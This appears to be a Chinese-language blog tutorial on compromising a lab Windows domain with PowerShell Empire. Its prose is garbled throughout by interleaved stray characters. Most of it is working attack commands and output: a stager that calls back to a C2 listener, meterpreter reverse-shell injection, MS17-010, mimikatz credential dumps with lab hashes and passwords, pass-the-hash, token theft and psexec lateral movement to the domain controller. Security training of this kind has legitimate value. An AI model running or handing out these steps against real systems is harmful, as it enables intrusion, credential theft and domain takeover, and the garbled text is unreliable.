前言
自從powershell在windows開(kāi)始預(yù)裝之后秆吵,就成為Windows內(nèi)網(wǎng)滲透的好幫手样傍,好處多多:天生免殺、無(wú)文件落地镜遣、無(wú)日志(霧)己肮。
于是老外開(kāi)發(fā)了empire框架,畢竟cobalt strike要收費(fèi)的不是悲关?
功能模塊豐富谎僻,老外把內(nèi)網(wǎng)[域]滲透中能用到的都整合進(jìn)去了:內(nèi)網(wǎng)探測(cè),提權(quán)寓辱,憑據(jù)獲取艘绍,橫向移動(dòng),權(quán)限維持秫筏。模塊那么多诱鞠,不懂就searchmodule或者[tab]兩下。
安裝
基于debian系的跳昼,如kali或者ubuntu都可以安裝般甲。
git clone https://github.com/EmpireProject/Empire.git
在執(zhí)行安裝腳本之前肋乍,建議修改軟件源和pip源鹅颊,避免因?yàn)榫W(wǎng)絡(luò)問(wèn)題安裝失敗。
sudo ./setup/install.sh
構(gòu)建監(jiān)聽(tīng)器
安裝好后執(zhí)行./empire后就可以用了墓造。
先查看可用的Listener有哪些堪伍?[tab]兩下就出來(lái)了所有可用的锚烦。
(Empire: listeners) > uselistener
dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector
通過(guò)info查看指定模塊的配置信息
- http[s],用http[s]進(jìn)行交互帝雇。
- http_com涮俄,使用IE的COM組件進(jìn)行交互。
- http_foreign尸闸,這個(gè)跟
http看不出差別在哪彻亲。 - http_hop,接收到的請(qǐng)求轉(zhuǎn)發(fā)到其他的listener吮廉,猜測(cè)用于C2苞尝。
- dbx|onedrive,使用
dropbox或者onedrive作為信息傳遞的中介宦芦,類似QQ空間上線或者weibo上線的遠(yuǎn)控宙址。 - http_mapi,通過(guò)郵件上線调卑。
- meterpreter抡砂,就不多說(shuō)了,大家都知道的恬涧。
這里還是先使用http的監(jiān)聽(tīng),通過(guò)set Port 8080修改監(jiān)聽(tīng)的端口注益,2.x版必須同時(shí)設(shè)置Host,然后execute啟動(dòng)監(jiān)聽(tīng)溯捆。
(Empire: listeners/dbx) > back
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name test
(Empire: listeners/http) > execute
[*] Starting listener 'test'
[+] Listener successfully started!
通過(guò)list命令查看正在運(yùn)行的監(jiān)聽(tīng)
(Empire: listeners) > list
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
test http http://192.168.99.240:8080 5/0.0
可以通過(guò)usestager來(lái)生成文件聊浅,引誘對(duì)方運(yùn)行,可以看到支持linux现使、Windows低匙、osx。
(Empire: listeners) > usestager
multi/bash osx/application osx/macho windows/bunny windows/launcher_sct
multi/launcher osx/ducky osx/macro windows/dll windows/launcher_vbs
multi/pyinstaller osx/dylib osx/pkg windows/ducky windows/macro
multi/war osx/jar osx/safari_launcher windows/hta windows/teensy
osx/applescript osx/launcher osx/teensy windows/launcher_bat
這里我們選用launcher_bat碳锈,通過(guò)info查看可以配置的參數(shù)顽冶。
(Empire: stager/windows/launcher_bat) > info
Name: BAT Launcher
Description:
Generates a self-deleting .bat launcher for
Empire.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile False /tmp/launcher.bat File to output .bat launcher to,
otherwise displayed on the screen.
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Delete False True Switch. Delete .bat after running.
StagerRetries False 0 Times for the stager to retry
connecting.
這里需要注意的是Listener的Name,必須跟前面啟用的Listener的一致售碳。
(Empire: stager/windows/launcher_bat) > set Listener test
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
生成的文件內(nèi)容是這樣子的
@echo off
start /b powershell -noP -sta -w 1 -enc WwBSAGUARgBdAC4AQQBTAHMAZQBNAEIAbABZAC4ARwBFAHQAVAB5AHAAZQAoACcAUwB5AHM...
start /b "" cmd /c del "%~f0"&exit /b
其中那么一大段的powershell命令强重,跟(Empire: listeners) > launcher powershell test的執(zhí)行結(jié)果是一樣的。這里先不關(guān)心怎么讓其在別的機(jī)子上運(yùn)行贸人,那是另外的技術(shù)活间景。
Agent回連
用win7的cmd執(zhí)行了那一串命令后,進(jìn)程中可以看到有powershell.exe
執(zhí)行agents命令查看回連的機(jī)子艺智,然后interact BNR1T9ZC來(lái)與之進(jìn)行交互倘要。
(Empire) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
BNR1T9ZC ps 1.1.1.11 USERUQI-5SKFS8A TEST\user powershell/2620 5/0.0 2017-08-11 22:50:12
(Empire: agents) > interact BNR1T9ZC
通過(guò)help命令可以查看到在agent上可以執(zhí)行很多命令。這里挑些重要的講十拣。
bypassuac封拧,顧名思義就是繞過(guò)uac的志鹃。除非你是本機(jī)的administrator,否則普通管理員都需要右鍵某個(gè)程序泽西,然后選擇run as administrator才能運(yùn)行,這都是uac作的怪捧杉。
因?yàn)檫@里是用普通域用戶權(quán)限執(zhí)行的陕见,連本機(jī)的普通管理員都不算,所以失敗了味抖。
(Empire: BNR1T9ZC) > bypassuac test
(Empire: BNR1T9ZC) >
Job started: S8D3ZM
[!] Current user not a local administrator!
sc淳玩,屏幕截圖命令,可以通過(guò)這個(gè)了解機(jī)子上的人正在做什么。
(Empire: DUL6BFCM) >
Output saved to ./downloads/DUL6BFCM/screenshot/USERUQI-5SKFS8A_2017-08-12_10-33-57.png
我們看看usemodule還有哪些可用的模塊非竿?(有些模塊需要對(duì)應(yīng)權(quán)限才能成功運(yùn)行)
(Empire: DUL6BFCM) > usemodule
Display all 193 possibilities? (y or n)
| 模塊名稱 | 作用 |
|---|---|
| code_execution | 代碼執(zhí)行蜕着? |
| collection | 收集瀏覽器、剪切板红柱、keepass承匣、文件瀏覽記錄等信息 |
| credentials | 密碼憑據(jù)的獲取和轉(zhuǎn)儲(chǔ) |
| exfiltration | 信息滲出 |
| exploitation | 漏洞溢出 |
| lateral_movement | 橫向 |
| management | 用來(lái)執(zhí)行些系統(tǒng)設(shè)置,和郵件信息的收集 |
| persistence | 權(quán)限維持 |
| privesc | 本機(jī)權(quán)限提升 |
| recon | 偵察 |
| situational_awareness | 評(píng)估主機(jī)運(yùn)行環(huán)境锤悄,網(wǎng)絡(luò)運(yùn)行環(huán)境 |
| trollsploit | 惡作劇 |
輸入help agentcmds可以看到可供使用的常用命令
[*] Available opsec-safe agent commands:
ls, dir, rm, del, cp, copy, pwd, cat, cd, mkdir,
rmdir, mv, move, ipconfig, ifconfig, route,
reboot, restart, shutdown, ps, tasklist, getpid,
whoami, getuid, hostname
執(zhí)行ipconfig查看網(wǎng)卡信息(如果不在help列表中韧骗,那么會(huì)自動(dòng)執(zhí)行遠(yuǎn)程主機(jī)上的可用命令)
(Empire: BNR1T9ZC) > ipconfig
(Empire: BNR1T9ZC) >
Description : Intel(R) 82574L Gigabit Network Connection
MACAddress : 00:0C:29:EA:21:46
DHCPEnabled : False
IPAddress : 1.1.1.11,fe80::e944:2051:c02f:456
IPSubnet : 255.255.255.0,64
DefaultIPGateway : 1.1.1.1
DNSServer : 1.1.1.10
DNSHostName : USERUQI-5SKFS8A
DNSSuffix : test.com
可以看到dns的ip是1.1.1.10,既是域控的ip
與metasploit聯(lián)動(dòng)
當(dāng)你獲得一個(gè)會(huì)話之后零聚,又想要派生更多會(huì)話袍暴,怎么辦?
使用invoke_shellcode來(lái)注入meterpreter的shellcode
(Empire: BNR1T9ZC) > usemodule code_execution/invoke_shellcode
(Empire: powershell/code_execution/invoke_shellcode) > info
ProcessID False Process ID of the process you want to
inject shellcode into.
Lhost False Local host handler for the meterpreter
shell.
Agent True BNR1T9ZC Agent to run module on.
Listener False Meterpreter/Beacon listener name.
Lport False Local port of the host handler.
Shellcode False Custom shellcode to inject,
0xaa,0xab,... format.
Payload False reverse_https Metasploit payload to inject
(reverse_http[s]).
metasploit先要設(shè)置一個(gè)listener
use exploit/mutli/handle
set payload windows/x64/meterpreter/reverse_https
然后empire執(zhí)行
(Empire: powershell/code_execution/invoke_shellcode) > set Lhost 192.168.99.240
(Empire: powershell/code_execution/invoke_shellcode) > set Lport 8888
(Empire: powershell/code_execution/invoke_shellcode) > execute
Job started: SWCFYD
成功獲取meterpreter會(huì)話(才怪隶症,empire2.5版本)
在session1建立到1.1.1.0/24網(wǎng)段的路由跳轉(zhuǎn)
run autoroute -s 1.1.1.0/24
通過(guò)sesesion1打通網(wǎng)段后政模,可以看到域控服務(wù)器1.1.1.10開(kāi)放的端口
使用ms17010成功獲取meterpreter會(huì)話。
至此蚂会,域控拿下淋样,可以開(kāi)始漫游內(nèi)網(wǎng)。(還是得靠metasploit胁住,單一個(gè)empire做的事情很有限)
獲取域管理員的明文憑據(jù)
用后滲透模塊credential_collector收集可用的憑據(jù)
empire可以直接使用mimikatz來(lái)獲取憑據(jù)趁猴。注意,此時(shí)客戶端上powershell進(jìn)程占用的cpu可達(dá)90%彪见,會(huì)引起卡頓
(Empire: MLGKNRUX) > mimikatz
(Empire: MLGKNRUX) >
Job started: KCGE61
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 583471 (00000000:0008e72f)
Session : Interactive from 2
User Name : user
Domain : TEST
Logon Server : WIN-EGQU692VVEO
Logon Time : 2017/8/12 20:29:49
SID : S-1-5-21-4238402708-2722160872-2769255546-1107
msv :
[00010000] CredentialKeys
* NTLM : 44f077e27f6fef69e7bd834c7242b040
* SHA1 : 5341b3e05f096263ff537bdcb2cebefef39a167f
[00000003] Primary
* Username : user
* Domain : TEST
* NTLM : 44f077e27f6fef69e7bd834c7242b040
* SHA1 : 5341b3e05f096263ff537bdcb2cebefef39a167f
tspkg :
wdigest :
* Username : user
* Domain : TEST
* Password : abc123!
kerberos :
* Username : user
* Domain : TEST.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 322350 (00000000:0004eb2e)
Session : Interactive from 1
User Name : Administrator
Domain : USERUQI-5SKFS8A
Logon Server : USERUQI-5SKFS8A
Logon Time : 2017/8/12 20:21:51
SID : S-1-5-21-2218037576-2376031825-1502863076-500
msv :
[00010000] CredentialKeys
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
[00000003] Primary
* Username : Administrator
* Domain : USERUQI-5SKFS8A
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
wdigest :
* Username : Administrator
* Domain : USERUQI-5SKFS8A
* Password : (null)
kerberos :
* Username : Administrator
* Domain : USERUQI-5SKFS8A
* Password : (null)
ssp :
credman :
creds查看獲取的憑據(jù)
(Empire: MLGKNRUX) > creds
Credentials:
CredID CredType Domain UserName Host Password
------ -------- ------ -------- ---- --------
1 hash test.com user USERUQI-5SKFS8A 44f077e27f6fef69e7bd834c7242b040
2 hash USERUQI-5SKFS8A Administrator USERUQI-5SKFS8A 31d6cfe0d16ae931b73c59d7e0c089c0
3 hash test.com USERUQI-5SKFS8A$ USERUQI-5SKFS8A fc646d691aaeda35dd5b605d3cbb1ddb
4 plaintext test.com user USERUQI-5SKFS8A abc123!
利用pth來(lái)傳遞hash儡司,用這個(gè)hash創(chuàng)建一個(gè)新的進(jìn)程,可以看到新的進(jìn)程id是3032
(Empire: MLGKNRUX) > pth 1
(Empire: MLGKNRUX) >
Job started: 5W1GST
Hostname: USERUQI-5SKFS8A.test.com / S-1-5-21-2218037576-2376031825-1502863076
mimikatz(powershell) # sekurlsa::pth /user:user /domain:test.com /ntlm:44f077e27f6fef69e7bd834c7242b040
user : user
domain : test.com
program : cmd.exe
impers. : no
NTLM : 44f077e27f6fef69e7bd834c7242b040
| PID 3032
| TID 452
| LSA Process is now R/W
| LUID 0 ; 1042120 (00000000:000fe6c8)
\_ msv1_0 - data copy @ 0000000000227C20 : OK !
\_ kerberos - data copy @ 000000000026A148
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
Use credentials/token to steal the token of the created PID.
然后credentials/tokens查看不同用戶的進(jìn)程id
(Empire: powershell/credentials/tokens) > execute
Domain Username ProcessId IsElevated TokenType
------ -------- --------- ---------- ---------
TEST user 200 False Primary
NT AUTHORITY SYSTEM 480 True Primary
NT AUTHORITY NETWORK SERVICE 1840 True Primary
USERUQI-5SKFS8A Administrator 2620 True Primary
對(duì)指定進(jìn)程steal_token之后余指,再去與agent交互就是域用戶user的權(quán)限了捕犬。
(Empire: MLGKNRUX) > steal_token 3032
(Empire: MLGKNRUX) > sysinfo: 0|http://192.168.99.165:8080|TEST|user|USERUQI-5SKFS8A|1.1.1.11|Microsoft Windows 7 專業(yè)版 |False|powershell|2788|powershell|2
(Empire: agents) > interact MLGKNRUX
Running As: TEST\user
用revtoself再切換回原來(lái)的權(quán)限(普通域用戶權(quán)限太低做不了什么)
(Empire: MLGKNRUX) > revtoself
(Empire: MLGKNRUX) > sysinfo: 0|http://192.168.99.165:8080|USERUQI-5SKFS8A|Administrator|USERUQI-5SKFS8A|1.1.1.11|Microsoft Windows 7 專業(yè)版 |True|powershell|2788|powershell|2
到這里嘗試了好幾個(gè)situational_awareness/network/powerview的模塊返回的都是空結(jié)果,看來(lái)是需要域管理員才能執(zhí)行成功。
運(yùn)氣爆棚的時(shí)候或听?
碰巧域管理員也登陸這臺(tái)機(jī)子,那么就能用他的權(quán)限做很多事情了笋婿。
5 hash test.com Administrator USERUQI-5SKFS8A db1d3b8e9a069f5890339a33328e42a2
6 plaintext test.com Administrator USERUQI-5SKFS8A abc123!@#
也可以使用usemodule management/psinject進(jìn)行切換誉裆,設(shè)置好ProcessId即可
(Empire: powershell/management/psinject) > set ProcId 396
(Empire: powershell/management/psinject) > set Listener test
(Empire: powershell/management/psinject) > execute
(Empire: powershell/management/psinject) >
Job started: VGZL5P
[+] Initial agent E6LKS124 from 192.168.99.179 now active
現(xiàn)在我們又獲得了一次域管理員權(quán)限,可以開(kāi)始橫向移動(dòng)了缸濒。
先內(nèi)網(wǎng)探測(cè)下可用的機(jī)子有哪些足丢,使用了situational_awareness中的三個(gè)模塊:
find_localadmin_access user_hunter get_domain_controller
(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute
Job started: FP3Z2W
WIN-EGQU692VVEO.test.com
USERUQI-5SKFS8A.test.com
x-2a37f335db5e4.test.com
(Empire: powershell/situational_awareness/network/powerview/user_hunter) >
Job started: 3NFBHP
UserDomain : TEST
UserName : Administrator
ComputerName : WIN-EGQU692VVEO.test.com
IPAddress : 1.1.1.10
SessionFrom :
SessionFromName :
LocalAdmin :
UserDomain : test.com
UserName : Administrator
ComputerName : USERUQI-5SKFS8A.test.com
IPAddress : 1.1.1.11
SessionFrom :
SessionFromName :
LocalAdmin :
(Empire: powershell/situational_awareness/network/powerview/get_domain_controller) > execute
Job started: 9D18BM
Forest : test.com
CurrentTime : 2017/8/12 15:15:48
HighestCommittedUsn : 28748
OSVersion : Windows Server 2008 R2 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : test.com
IPAddress : 1.1.1.10
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : WIN-EGQU692VVEO.test.com
Partitions : {DC=test,DC=com, CN=Configuration,DC=test,DC=com, C
N=Schema,CN=Configuration,DC=test,DC=com, DC=Domain
DnsZones,DC=test,DC=com...}
又一次可以確定1.1.1.10就是域控所在了。用lateral_movement/invoke_psexec移動(dòng)到域控服務(wù)器上面庇配。
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WIN-EGQU692VVEO.test.com
(Empire: powershell/lateral_movement/invoke_psexec) > set Listener test
(Empire: powershell/lateral_movement/invoke_psexec) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/lateral_movement/invoke_psexec) >
Job started: 2C1AG8
[+] Initial agent ZWHA4EPB from 192.168.99.179 now active
(Empire: powershell/lateral_movement/invoke_psexec) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
MLGKNRUX ps 1.1.1.11 USERUQI-5SKFS8A *USERUQI-5SKFS8A\Admpowershell/2788 5/0.0 2017-08-12 11:24:56
E6LKS124 ps 1.1.1.11 USERUQI-5SKFS8A *USERUQI-5SKFS8A\Admcmd/396 5/0.0 2017-08-12 11:24:52
ZWHA4EPB ps 1.1.1.10 WIN-EGQU692VVEO *TEST\SYSTEM powershell/1740 5/0.0 2017-08-12 11:24:54
終于又回到了域控服務(wù)器斩跌,接下來(lái)要考慮的是如何導(dǎo)出域控上面的所有hash,并且維持權(quán)限捞慌。
